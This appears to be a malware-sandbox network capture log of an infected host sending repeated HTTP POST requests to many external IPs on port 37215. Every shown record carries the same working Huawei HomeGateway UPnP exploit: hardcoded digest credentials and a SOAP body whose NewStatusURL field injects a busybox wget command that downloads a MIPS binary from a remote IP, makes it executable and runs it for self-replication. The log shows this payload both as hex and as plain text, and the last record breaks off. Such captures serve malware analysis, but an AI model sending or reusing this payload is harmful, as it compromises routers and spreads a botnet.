                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2116192.168.2.234617041.69.25.22837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.618927002 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2117192.168.2.2335110157.81.190.3237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.621282101 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2118192.168.2.234613441.131.22.037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.621396065 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2119192.168.2.2351990154.207.115.5537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.621406078 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2120192.168.2.234428241.217.28.21037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.622152090 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2121192.168.2.2335550130.194.10.9837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.622183084 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2122192.168.2.2340564197.22.139.14937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.622186899 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2123192.168.2.2360964177.228.199.5837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.622210026 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2124192.168.2.233900893.46.187.12137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.622210979 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2125192.168.2.2356674133.103.61.13237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.622292042 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2126192.168.2.233800641.242.37.11637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.622833967 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
